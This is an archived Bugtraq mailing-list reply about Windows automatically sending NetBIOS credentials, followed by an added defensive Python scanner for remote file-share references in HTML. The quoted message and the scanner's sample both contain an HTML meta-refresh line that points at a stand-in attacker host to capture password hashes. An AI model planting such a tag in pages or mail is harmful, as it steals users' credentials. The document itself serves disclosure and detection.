[16798] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Bronek Kozicki)
Mon Sep 18 00:43:40 2000
Message-Id: <005301c01f40$4341d610$9e03a8c0@bronek>
Date: Fri, 15 Sep 2000 20:10:38 +0200
Reply-To: Bronek Kozicki <brok@RUBIKON.PL>
From: Bronek Kozicki <brok@RUBIKON.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
From: "Ryagin Mihail Yurevitch" <ryagin@EXTRIM.RU>
> The problem is far more general than within a single poor configuration default in telnet.exe.
> The main problem is that Windows automatically supplies user credentials in many situations without ever asking for his opinion.
> For example, the following html file:
> <meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt">
> will automatically connect to the evil site through NetBIOS and supply user password hashes.
> Putting the malicious site into 'Restricted Zone' doesn't help.
That's why, exactly, you do not pass NetBIOS through your firewall -
incoming as well as _outgoing_ traffic.
Kind regards
B.
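
A defensive check for the pattern quoted above, as an added example that is not part of the original message: it scans HTML for attributes, including meta refresh targets, that point at a remote host through a file: URL or a UNC path, the reference that makes the client open the connection. The function and class names, the sample markup and the host fileserver.example are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# A file: URL with a host part, or a bare UNC path (\\host\share\...).
# file:///C:/... does not match because "C:" is not followed by a slash.
REMOTE_FILE = re.compile(r'^(?:file:[\\/]{2,}|\\\\)([\w.-]+)[\\/]', re.I)
# Target of <meta http-equiv="refresh" content="5;URL=...">
REFRESH_URL = re.compile(r'url\s*=\s*["\']?(.+)', re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

class RemoteFileRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute, remote host) in document order

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            target = value.strip()
            if tag == "meta" and name == "content":
                refresh = REFRESH_URL.search(target)
                if not refresh:
                    continue
                target = refresh.group(1).strip()
            match = REMOTE_FILE.match(target)
            if match and match.group(1).lower() not in LOCAL_HOSTS:
                self.hits.append((tag, name, match.group(1).lower()))

def find_remote_file_refs(html):
    """Return every attribute that would make the client fetch from a remote share."""
    finder = RemoteFileRefFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample: the meta tag from the message plus benign and local references.
SAMPLE = r"""<html><head>
<meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt">
<meta name="description" content="plain page">
</head><body>
<img src="\\fileserver.example\share\logo.gif">
<a href="file:///C:/docs/readme.txt">local file</a>
<img src="//cdn.example/x.png"><a href="http://example.com/">web link</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host in find_remote_file_refs(SAMPLE):
        print(f"<{tag} {attr}=...> references remote share host {host}")
```

Run over mail bodies or proxied pages, this flags the references before a client follows them; it complements, and does not replace, blocking NetBIOS at the firewall.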